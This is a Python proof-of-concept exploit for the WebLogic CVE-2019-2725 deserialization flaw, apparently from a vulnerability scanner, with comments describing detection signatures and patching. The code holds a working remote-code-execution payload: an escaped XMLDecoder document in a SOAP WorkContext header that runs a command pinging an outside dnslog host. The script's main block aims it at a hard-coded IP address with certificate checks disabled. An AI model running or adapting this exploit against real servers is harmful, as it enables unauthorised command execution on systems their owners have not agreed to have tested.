# coding:utf-8
import requests
import sys
import base64
# Silences urllib3 warnings process-wide -- in particular the InsecureRequestWarning
# that the verify=False requests in c2Class.c2Func would otherwise emit on every call.
requests.packages.urllib3.disable_warnings()

class c2Class(object):
    """Single-target check for CVE-2019-2725 in the WebLogic async component.

    __init__ holds the vulnerability metadata, the SOAP request that is sent,
    and the response conditions treated as "vulnerable"; c2Func drives one
    target and returns (status, message).  The parts a defender can reuse are
    the request shape (endpoint, headers, payload markers) that an access-log
    or WAF rule can match on.  Remediation is the vendor patch for
    CVE-2019-2725 and restricting external access to the /_async/ path.
    """
    def __init__(self):
        # Descriptive metadata; vulname is interpolated into the result message.
        self.vulname = 'weblogic 12 rce(CVE-2019-2725)'
        self.cveid='CVE-2019-2725'
        self.vulsystem= 'weblogic'
        self.vulversion = '10.*; 12.1.3'
        self.findtime='2019-4'
        self.fofa='app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"'
        self.refer= 'https://www.77169.net/html/260737.html\nhttps://zhuanlan.zhihu.com/p/345449257'
        self.testisok=False

        # Endpoint that receives the request.  A text/xml POST to this path from
        # outside the expected client population is itself a detection signal.
        self.vulpath='/_async/AsyncResponseService'
        # XMLDecoder document nested inside the SOAP WorkContext header.  The
        # command it names is an outbound ping to a dnslog host, so the exploit
        # result is presumably observed out of band (DNS/ICMP leaving the server)
        # rather than in the HTTP reply -- the reply is only checked for
        # status code and body length in c2Func.
        self.javace='<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>ping thplia.dnslog.cn</string></void></array><void method="start" /></object></java>'
        # SOAP envelope; the document above is embedded as escaped text via
        # htmlescape.  A `work:WorkContext` header carrying a `<java>` element is
        # the marker detection rules for this CVE family generally key on.
        self.payload= '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string>%s</string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''%self.htmlescape(self.javace)
        # print(self.payload)
        # Spoofed Java HttpClient User-Agent plus an empty SOAPAction; together
        # with the path above this is a compact log signature for this scanner.
        self.headers={'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'Content-Type': 'text/xml',
        'Accept-Encoding': 'gzip, deflate',
        'SOAPAction':''}
        # Substring expected in the GET response when the async service is
        # reachable; used as a presence check before the payload is sent.
        self.flag='Welcome to the {http://www.bea.com'
        # "Vulnerable" verdict: the POST is answered with 200 and an empty body.
        self.flag1=200
        self.flag2=0

    def htmlescape(self,str):
    	"""Return *str* rewritten as one `&#...;` character reference per character.

    	Used so the XMLDecoder document can sit as text inside a <string>
    	element of the outer SOAP envelope.  The parameter name shadows the
    	builtin `str` within this method.
    	"""
    	escapeStr=''
    	for c in str:
    		escapeStr=escapeStr+'&#%s;'%(hex(ord(c))[2:])
    	return escapeStr

    def c2Func(self,target):
        """Check one target and return (status, message).

        status is 1 only when the GET presence check matched and the POST came
        back with the expected status code and body length; otherwise 0.  Any
        exception (connection errors included) is caught and its text returned
        as the message with status 0, so "unreachable" and "not vulnerable"
        differ only by the message text.
        """
        status=0
        returnData=''
        try:
            if target.startswith(('http://','https://')):
                # Reduce a URL to <scheme>://<host[:port]>: append '/' and cut
                # at the first '/' that follows the scheme prefix.
                target=target+'/'
                target=target[:target.find('/',8)] # look for '/' after the leading https:// or http://
            else:
                # A bare host[:port] defaults to plain http.
                target='http://'+target
            url=target.strip('/')+self.vulpath
            # Presence check first.  verify=False on both requests: TLS
            # certificates are not validated.
            resp=requests.get(url=url,verify=False,timeout=5)
            if self.flag in resp.content:           
                resp=requests.post(url=url,headers=self.headers,data=self.payload,verify=False,timeout=5)
                if self.flag1 == resp.status_code:
                	print(resp.content)  # debug leftover: dumps the raw body on every 200
                if self.flag1 == resp.status_code and self.flag2 == len(resp.content):
                    returnData='%s is vuln(%s), vulnpath: %s'%(target,self.vulname,url)
                    status=1
        except Exception as e:
            # Broad catch: network errors and internal errors alike end up here.
            returnData=str(e)
        return status,returnData

if __name__ == '__main__':
    # Runs the check once against a single hard-coded host:port and prints the
    # (status, message) tuple.  `sys` is imported at the top of the file but
    # not used here, so there is no command-line handling of the target.
    target='https://42.194.226.30:5050'
    pocObj=c2Class()
    print(pocObj.c2Func(target))